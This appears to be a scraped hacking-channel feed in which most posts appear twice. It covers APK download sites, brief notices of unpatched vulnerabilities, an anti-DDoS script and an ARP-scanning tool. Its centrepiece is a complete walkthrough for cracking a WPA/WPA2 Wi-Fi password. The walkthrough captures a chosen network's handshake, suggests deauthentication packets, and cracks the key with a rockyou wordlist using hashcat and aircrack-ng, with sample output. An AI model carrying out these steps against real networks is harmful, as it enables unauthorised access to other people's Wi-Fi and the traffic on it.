β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦Search for any apk and download:
https://apk4free.net/
https://www.apkmirror.com/
https://apkpure.com/
https://www.9apps.com/
https://www.revdl.com/
https://androidapksfree.com/
https://www.modapkdown.com/
http://apkreal.com/
http://allfreeapk.com/
https://an1.com/
https://www.apkwhale.com/
https://www.androidp1.com/
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦Search for any apk and download:
https://apk4free.net/
https://www.apkmirror.com/
https://apkpure.com/
https://www.9apps.com/
https://www.revdl.com/
https://androidapksfree.com/
https://www.modapkdown.com/
http://apkreal.com/
http://allfreeapk.com/
https://an1.com/
https://www.apkwhale.com/
https://www.androidp1.com/
β β β Uππ»βΊπ«Δπ¬πβ β β β
Forwarded from DailyCVE
π΅Unpatched Dada accelerator has binary vulnerability:
https://dailycve.com/unpatched-dada-accelerator-has-binary-vulnerability
https://dailycve.com/unpatched-dada-accelerator-has-binary-vulnerability
Dailycve
Unpatched Dada accelerator has binary vulnerability | CVE
Details:
DaDa accelerator is an online game accelerator tool of high quality built for the majority of gamers.
There is a binary weakness in the DaDa accelerator. The intruder will use the built software to trigger the blue screen of the machine toβ¦
Forwarded from DailyCVE
π΅Unpatched SKYUC has SQL injection vulnerability:
https://dailycve.com/unpatched-skyuc-has-sql-injection-vulnerability
https://dailycve.com/unpatched-skyuc-has-sql-injection-vulnerability
Dailycve
Unpatched SKYUC has SQL injection vulnerability | CVE
Details:
SKYUC is a leading domestic PHP video-on-demand (movie program) system built by Sky Network after several years of growth. A set of P2P streaming media applications is perfectly supported and is ideal for popular film portals, internet cafesβ¦
Forwarded from UNDERCODE NEWS
Will Parler's blockage limit freedom of speech? Cook: We are a private network with laws and regulations.
#International
#International
Forwarded from UNDERCODE NEWS
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦ Anti DDOS solution:
Anti-DDOS project is an open source software project developed to protect against DOS and DDoS attacks. The project was written using bash programming language. By writing iptables rules into the Linux operating system. Takes the necessary defense configurations. And it only works on the linux operating system. 100% compatible for Linux operating systems. It does not provide 100% security, it will only help you to take the necessary measures.
πΈπ½π π π°π»π»πΈπ π°π πΈπΎπ½ & π π π½ :
1) Cloning an Existing Repository ( Clone with HTTPS )
root@ismailtasdelen:~# git clone https://github.com/ismailtasdelen/Anti-DDOS.git
Cloning an Existing Repository ( Clone with SSH )
root@ismailtasdelen:~# git clone git@github.com:ismailtasdelen/Anti-DDOS.git
2) go to dir
3) root@ismailtasdelen:~# bash ./anti-ddos.sh
Denial of Service : https://www.owasp.org/index.php/Denial_of_Service
Denial of Service Cheat Sheet : https://www.owasp.org/index.php/Denial_of_Service_Cheat_Sheet
Application Denial of Service : https://www.owasp.org/
index.php/Application_Denial_of_Service
Testing for Denial of Service : https://www.owasp.org/index.php/Testing_for_Denial_of_Service
DRAFT Denial of Service Cheat Sheet : https://www.owasp.org/index.php/DRAFT_Denial_of_Service_Cheat_Sheet
Regular expression Denial of Service - ReDoS : https://www.owasp.org/index.php/
Regular_expression_Denial_of_Service_-_ReDoS
Published Website :
KitPloit - https://www.kitploit.com/2017/10/anti-ddos-anti-ddos-bash-script.html
CISOfy - https://linuxsecurity.expert/tools/anti-ddos/
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦ Anti DDOS solution:
Anti-DDOS project is an open source software project developed to protect against DOS and DDoS attacks. The project was written using bash programming language. By writing iptables rules into the Linux operating system. Takes the necessary defense configurations. And it only works on the linux operating system. 100% compatible for Linux operating systems. It does not provide 100% security, it will only help you to take the necessary measures.
πΈπ½π π π°π»π»πΈπ π°π πΈπΎπ½ & π π π½ :
1) Cloning an Existing Repository ( Clone with HTTPS )
root@ismailtasdelen:~# git clone https://github.com/ismailtasdelen/Anti-DDOS.git
Cloning an Existing Repository ( Clone with SSH )
root@ismailtasdelen:~# git clone git@github.com:ismailtasdelen/Anti-DDOS.git
2) go to dir
3) root@ismailtasdelen:~# bash ./anti-ddos.sh
Denial of Service : https://www.owasp.org/index.php/Denial_of_Service
Denial of Service Cheat Sheet : https://www.owasp.org/index.php/Denial_of_Service_Cheat_Sheet
Application Denial of Service : https://www.owasp.org/
index.php/Application_Denial_of_Service
Testing for Denial of Service : https://www.owasp.org/index.php/Testing_for_Denial_of_Service
DRAFT Denial of Service Cheat Sheet : https://www.owasp.org/index.php/DRAFT_Denial_of_Service_Cheat_Sheet
Regular expression Denial of Service - ReDoS : https://www.owasp.org/index.php/
Regular_expression_Denial_of_Service_-_ReDoS
Published Website :
KitPloit - https://www.kitploit.com/2017/10/anti-ddos-anti-ddos-bash-script.html
CISOfy - https://linuxsecurity.expert/tools/anti-ddos/
β β β Uππ»βΊπ«Δπ¬πβ β β β
GitHub
GitHub - anti-ddos/Anti-DDOS: π Anti DDOS | Bash Script Project π
π Anti DDOS | Bash Script Project π. Contribute to anti-ddos/Anti-DDOS development by creating an account on GitHub.
Forwarded from UNDERCODE NEWS
Forwarded from UNDERCODE NEWS
At least 2 Xbox masterpieces that were not yet announced in 2021 will be open to Microsoft.
#Technologies
#Technologies
Forwarded from DailyCVE
π΅Unpatched dada accelerator has binary vulnerability (DC 208-2021)
https://dailycve.com/unpatched-dada-accelerator-has-binary-vulnerability-0
https://dailycve.com/unpatched-dada-accelerator-has-binary-vulnerability-0
Dailycve
Unpatched dada accelerator has binary vulnerability | CVE
Details:
DaDa accelerator is an online game accelerator tool of high quality built for the majority of gamers.
There is a binary weakness in the DaDa accelerator. The intruder will use the built software to trigger the blue screen of the machine toβ¦
Forwarded from DailyCVE
π΅Upatched UCMS backend ai***.php file has SQL injection vulnerability (DC: 209-2021)
https://dailycve.com/upatched-ucms-backend-aiphp-file-has-sql-injection-vulnerability
https://dailycve.com/upatched-ucms-backend-aiphp-file-has-sql-injection-vulnerability
Dailycve
Upatched UCMS backend ai***.php file has SQL injection vulnerability | CVE
Details:
UCMS is a series of content management systems written in the language of PHP.
In the ai***.php file in the UCMS backend, a SQL injection flaw occurs. Vulnerabilities may be exploited by attackers to access personal information in the databaseβ¦
Forwarded from UNDERCODER
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦Crack WPA/WPA2 Wi-Fi Routers with Airodump-ng and Aircrack-ng/Hashcat:
Begin by listing wireless interfaces that support monitor mode with:
A) airmon-ng
If you do not see an interface listed then your wireless card does not support monitor mode π
We will assume your wireless interface name is wlan0 but be sure to use the correct name if it differs from this. Next, we will place the interface into monitor mode:
airmon-ng start wlan0
Run iwconfig. You should now see a new monitor mode interface listed (likely mon0 or wlan0mon).
B) Find Your Target
Start listening to 802.11 Beacon frames broadcast by nearby wireless routers using your monitor interface:
airodump-ng mon0
You should see output similar to what is below.
C) Capture a 4-way Handshake
WPA/WPA2 uses a 4-way handshake to authenticate devices to the network. You don't have to know anything about what that means, but you do have to capture one of these handshakes in order to crack the network password. These handshakes occur whenever a device connects to the network, for instance, when your neighbor returns home from work. We capture this handshake by directing airmon-ng to monitor traffic on the target network using the channel and bssid values discovered from the previous command.
π¦Crack WPA/WPA2 Wi-Fi Routers with Airodump-ng and Aircrack-ng/Hashcat:
Begin by listing wireless interfaces that support monitor mode with:
A) airmon-ng
If you do not see an interface listed then your wireless card does not support monitor mode π
We will assume your wireless interface name is wlan0 but be sure to use the correct name if it differs from this. Next, we will place the interface into monitor mode:
airmon-ng start wlan0
Run iwconfig. You should now see a new monitor mode interface listed (likely mon0 or wlan0mon).
B) Find Your Target
Start listening to 802.11 Beacon frames broadcast by nearby wireless routers using your monitor interface:
airodump-ng mon0
You should see output similar to what is below.
C) Capture a 4-way Handshake
WPA/WPA2 uses a 4-way handshake to authenticate devices to the network. You don't have to know anything about what that means, but you do have to capture one of these handshakes in order to crack the network password. These handshakes occur whenever a device connects to the network, for instance, when your neighbor returns home from work. We capture this handshake by directing airmon-ng to monitor traffic on the target network using the channel and bssid values discovered from the previous command.
Forwarded from UNDERCODER
# replace -c and --bssid values with the values of your target network
# -w specifies the directory where we will save the packet capture
airodump-ng -c 3 --bssid 9C:5C:8E:C9:AB:C0 -w . mon0
CH 6 ][ Elapsed: 1 min ][ 2017-07-23 16:09 ]
BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
9C:5C:8E:C9:AB:C0 -47 0 140 0 0 6 54e WPA2 CCMP PSK ASUS
D) Now we wait... Once you've captured a handshake, you should see something like [ WPA handshake: bc:d3:c9:ef:d2:67 at the top right of the screen, just right of the current time.
If you are feeling impatient, and are comfortable using an active attack, you can force devices connected to the target network to reconnect, be sending malicious deauthentication packets at them. This often results in the capture of a 4-way handshake. See the deauth attack section below for info on this.
E) Once you've captured a handshake, press ctrl-c to quit airodump-ng. You should see a .cap file wherever you told airodump-ng to save the capture (likely called -01.cap). We will use this capture file to crack the network password. I like to rename this file to reflect the network name we are trying to crack:
mv ./-01.cap hackme.cap
Crack the Network Password
E) The final step is to crack the password using the captured handshake. If you have access to a GPU, I highly recommend using hashcat for password cracking. I've created a simple tool that makes hashcat super easy to use called naive-hashcat. If you don't have access to a GPU, there are various online GPU cracking services that you can use, like GPUHASH.me or OnlineHashCrack. You can also try your hand at CPU cracking with Aircrack-ng.
Note that both attack methods below assume a relatively weak user generated password. Most WPA/WPA2 routers come with strong 12 character random passwords that many users (rightly) leave unchanged. If you are attempting to crack one of these passwords, I recommend using the Probable-Wordlists WPA-length dictionary files.
F) Cracking With naive-hashcat (recommended)
Before we can crack the password using naive-hashcat, we need to convert our .cap file to the equivalent hashcat file format .hccapx. You can do this easily by either uploading the .cap file to https://hashcat.net/cap2hccapx/ or using the cap2hccapx tool directly.
cap2hccapx.bin hackme.cap hackme.hccapx
Next, download and run naive-hashcat:
# download
git clone https://github.com/brannondorsey/naive-hashcat
cd naive-hashcat
# download the 134MB rockyou dictionary file
curl -L -o dicts/rockyou.txt https://github.com/brannondorsey/naive-hashcat/releases/download/data/rockyou.txt
# crack ! baby ! crack !
# 2500 is the hashcat hash mode for WPA/WPA2
HASH_FILE=hackme.hccapx POT_FILE=hackme.pot HASH_TYPE=2500 ./naive-hashcat.sh
Naive-hashcat uses various dictionary, rule, combination, and mask (smart brute-force) attacks and it can take days or even months to run against mid-strength passwords. The cracked password will be saved to hackme.pot, so check this file periodically. Once you've cracked the password, you should see something like this as the contents of your POT_FILE:
e30a5a57fc00211fc9f57a4491508cc3:9c5c8ec9abc0:acd1b8dfd971:ASUS:hacktheplanet
Where the last two fields separated by : are the network name and password respectively.
If you would like to use hashcat without naive-hashcat see this page for info.
F) Cracking With Aircrack-ng
Aircrack-ng can be used for very basic dictionary attacks running on your CPU. Before you run the attack you need a wordlist. I recommend using the infamous rockyou dictionary file
β β β Uππ»βΊπ«Δπ¬πβ β β β
# -w specifies the directory where we will save the packet capture
airodump-ng -c 3 --bssid 9C:5C:8E:C9:AB:C0 -w . mon0
CH 6 ][ Elapsed: 1 min ][ 2017-07-23 16:09 ]
BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
9C:5C:8E:C9:AB:C0 -47 0 140 0 0 6 54e WPA2 CCMP PSK ASUS
D) Now we wait... Once you've captured a handshake, you should see something like [ WPA handshake: bc:d3:c9:ef:d2:67 at the top right of the screen, just right of the current time.
If you are feeling impatient, and are comfortable using an active attack, you can force devices connected to the target network to reconnect, be sending malicious deauthentication packets at them. This often results in the capture of a 4-way handshake. See the deauth attack section below for info on this.
E) Once you've captured a handshake, press ctrl-c to quit airodump-ng. You should see a .cap file wherever you told airodump-ng to save the capture (likely called -01.cap). We will use this capture file to crack the network password. I like to rename this file to reflect the network name we are trying to crack:
mv ./-01.cap hackme.cap
Crack the Network Password
E) The final step is to crack the password using the captured handshake. If you have access to a GPU, I highly recommend using hashcat for password cracking. I've created a simple tool that makes hashcat super easy to use called naive-hashcat. If you don't have access to a GPU, there are various online GPU cracking services that you can use, like GPUHASH.me or OnlineHashCrack. You can also try your hand at CPU cracking with Aircrack-ng.
Note that both attack methods below assume a relatively weak user generated password. Most WPA/WPA2 routers come with strong 12 character random passwords that many users (rightly) leave unchanged. If you are attempting to crack one of these passwords, I recommend using the Probable-Wordlists WPA-length dictionary files.
F) Cracking With naive-hashcat (recommended)
Before we can crack the password using naive-hashcat, we need to convert our .cap file to the equivalent hashcat file format .hccapx. You can do this easily by either uploading the .cap file to https://hashcat.net/cap2hccapx/ or using the cap2hccapx tool directly.
cap2hccapx.bin hackme.cap hackme.hccapx
Next, download and run naive-hashcat:
# download
git clone https://github.com/brannondorsey/naive-hashcat
cd naive-hashcat
# download the 134MB rockyou dictionary file
curl -L -o dicts/rockyou.txt https://github.com/brannondorsey/naive-hashcat/releases/download/data/rockyou.txt
# crack ! baby ! crack !
# 2500 is the hashcat hash mode for WPA/WPA2
HASH_FILE=hackme.hccapx POT_FILE=hackme.pot HASH_TYPE=2500 ./naive-hashcat.sh
Naive-hashcat uses various dictionary, rule, combination, and mask (smart brute-force) attacks and it can take days or even months to run against mid-strength passwords. The cracked password will be saved to hackme.pot, so check this file periodically. Once you've cracked the password, you should see something like this as the contents of your POT_FILE:
e30a5a57fc00211fc9f57a4491508cc3:9c5c8ec9abc0:acd1b8dfd971:ASUS:hacktheplanet
Where the last two fields separated by : are the network name and password respectively.
If you would like to use hashcat without naive-hashcat see this page for info.
F) Cracking With Aircrack-ng
Aircrack-ng can be used for very basic dictionary attacks running on your CPU. Before you run the attack you need a wordlist. I recommend using the infamous rockyou dictionary file
β β β Uππ»βΊπ«Δπ¬πβ β β β
hashcat.net
hashcat cap2hccapx - advanced password recovery
CAP-to-HCCAPX online converter page for WPA/WPA2
Forwarded from UNDERCODER
# download the 134MB rockyou dictionary file
curl -L -o rockyou.txt https://github.com/brannondorsey/naive-hashcat/releases/download/data/rockyou.txt
Note, that if the network password is not in the wordfile you will not crack the password.
# -a2 specifies WPA2, -b is the BSSID, -w is the wordfile
aircrack-ng -a2 -b 9C:5C:8E:C9:AB:C0 -w rockyou.txt hackme.cap
If the password is cracked you will see a KEY FOUND! message in the terminal followed by the plain text version of the network password.
Aircrack-ng 1.2 beta3
[00:01:49] 111040 keys tested (1017.96 k/s)
KEY FOUND! [ hacktheplanet ]
Master Key : A1 90 16 62 6C B3 E2 DB BB D1 79 CB 75 D2 C7 89
59 4A C9 04 67 10 66 C5 97 83 7B C3 DA 6C 29 2E
Transient Key : CB 5A F8 CE 62 B2 1B F7 6F 50 C0 25 62 E9 5D 71
2F 1A 26 34 DD 9F 61 F7 68 85 CC BC 0F 88 88 73
6F CB 3F CC 06 0C 06 08 ED DF EC 3C D3 42 5D 78
8D EC 0C EA D2 BC 8A E2 D7 D3 A2 7F 9F 1A D3 21
EAPOL HMAC : 9F C6 51 57 D3 FA 99 11 9D 17 12 BA B6 DB 06 B4
References: github, Ru foro
β β β Uππ»βΊπ«Δπ¬πβ β β β
curl -L -o rockyou.txt https://github.com/brannondorsey/naive-hashcat/releases/download/data/rockyou.txt
Note, that if the network password is not in the wordfile you will not crack the password.
# -a2 specifies WPA2, -b is the BSSID, -w is the wordfile
aircrack-ng -a2 -b 9C:5C:8E:C9:AB:C0 -w rockyou.txt hackme.cap
If the password is cracked you will see a KEY FOUND! message in the terminal followed by the plain text version of the network password.
Aircrack-ng 1.2 beta3
[00:01:49] 111040 keys tested (1017.96 k/s)
KEY FOUND! [ hacktheplanet ]
Master Key : A1 90 16 62 6C B3 E2 DB BB D1 79 CB 75 D2 C7 89
59 4A C9 04 67 10 66 C5 97 83 7B C3 DA 6C 29 2E
Transient Key : CB 5A F8 CE 62 B2 1B F7 6F 50 C0 25 62 E9 5D 71
2F 1A 26 34 DD 9F 61 F7 68 85 CC BC 0F 88 88 73
6F CB 3F CC 06 0C 06 08 ED DF EC 3C D3 42 5D 78
8D EC 0C EA D2 BC 8A E2 D7 D3 A2 7F 9F 1A D3 21
EAPOL HMAC : 9F C6 51 57 D3 FA 99 11 9D 17 12 BA B6 DB 06 B4
References: github, Ru foro
β β β Uππ»βΊπ«Δπ¬πβ β β β
Forwarded from DailyCVE
π΅Unpatched 360 security desktop has dll hijacking vulnerability (DC: 210-2021)
https://dailycve.com/unpatched-360-security-desktop-has-dll-hijacking-vulnerability
https://dailycve.com/unpatched-360-security-desktop-has-dll-hijacking-vulnerability
Dailycve
Unpatched 360 security desktop has dll hijacking vulnerability | CVE
Details:
To help you properly arrange your computer's desktop documentation and configurations, 360 Secure Desktop is a desktop application management program.
In 360 Protected Desktop, there is a DLL hijacking flaw that can be used to run maliciousβ¦
Forwarded from DailyCVE
Dailycve
Malwarebytes security breach | CVE
Details:
Malwarebytes is a US Malwarebytes software program that provides computers with anti-malware features. The program is designed to survive malicious malware such as bugs, spyware, Trojan horses, worms, dialers, etc. On macOS, Malwarebytes beforeβ¦
Forwarded from UNDERCODE NEWS
Forwarded from UNDERCODE NEWS
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦Python Scapy tools developed for LAN tests and advanced reconnaissance.:
πΈπ½π π π°π»π»πΈπ π°π πΈπΎπ½ & π π π½ :
1) pip3 install scapy
2) pip3 install netaddr
3) git clone https://github.com/peppelinux/pyLAN-tools.git
4) : arpscan.py [-h] -i I [-r R [R ...]] [-t T]
[-exclude EXCLUDE [EXCLUDE ...]] [-only ONLY [ONLY ...]]
[-debug]
arpscan usage examples
5) # scans only selected peers in the local network reachable on eth2 interface
6) python2 arpscan.py -i eth2 -t 0.01 -only 1 2 3 4 5 6 7 8 9 10 50 150 200 250 251 252 253 254
10.21.0.75 bc:5f:f4:f4:d0:d9 (eth2)
10.21.0.254 d4:ca:6d:e6:6a:d7
# scans only selected networks
python2 arpscan.py -i eth2 -t 0.01 -r 192.168.0.0/24 192.168.1.0/24 172.17.0.0/12
192.168.1.1 08:00:27:7c:f9:41
7) arpscan todo
parallelization with subprocess per every -r lan (performance improvements)
8) choose a number of worker to delegate a subset of addresses (address_pool/num_workers)
vendor database intergration and representation (as netdiscover already does)
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦Python Scapy tools developed for LAN tests and advanced reconnaissance.:
πΈπ½π π π°π»π»πΈπ π°π πΈπΎπ½ & π π π½ :
1) pip3 install scapy
2) pip3 install netaddr
3) git clone https://github.com/peppelinux/pyLAN-tools.git
4) : arpscan.py [-h] -i I [-r R [R ...]] [-t T]
[-exclude EXCLUDE [EXCLUDE ...]] [-only ONLY [ONLY ...]]
[-debug]
arpscan usage examples
5) # scans only selected peers in the local network reachable on eth2 interface
6) python2 arpscan.py -i eth2 -t 0.01 -only 1 2 3 4 5 6 7 8 9 10 50 150 200 250 251 252 253 254
10.21.0.75 bc:5f:f4:f4:d0:d9 (eth2)
10.21.0.254 d4:ca:6d:e6:6a:d7
# scans only selected networks
python2 arpscan.py -i eth2 -t 0.01 -r 192.168.0.0/24 192.168.1.0/24 172.17.0.0/12
192.168.1.1 08:00:27:7c:f9:41
7) arpscan todo
parallelization with subprocess per every -r lan (performance improvements)
8) choose a number of worker to delegate a subset of addresses (address_pool/num_workers)
vendor database intergration and representation (as netdiscover already does)
β β β Uππ»βΊπ«Δπ¬πβ β β β
GitHub
peppelinux/pyLAN-tools
LAN hacking tools with Python and Scapy. Contribute to peppelinux/pyLAN-tools development by creating an account on GitHub.
Forwarded from DailyCVE
π΅Unpatched binary vulnerability exists in ABC viewing software(DC: 212-2021)
https://dailycve.com/unpatched-binary-vulnerability-exists-abc-viewing-software
https://dailycve.com/unpatched-binary-vulnerability-exists-abc-viewing-software
Dailycve
Unpatched binary vulnerability exists in ABC viewing software | CVE
Details:
ABC Picture Viewer is a permanently free program for image viewing that turns on hardware acceleration intelligently and supports multiple image formats.
In the ABC picture watching program, there is a binary flaw which can be abused by attackersβ¦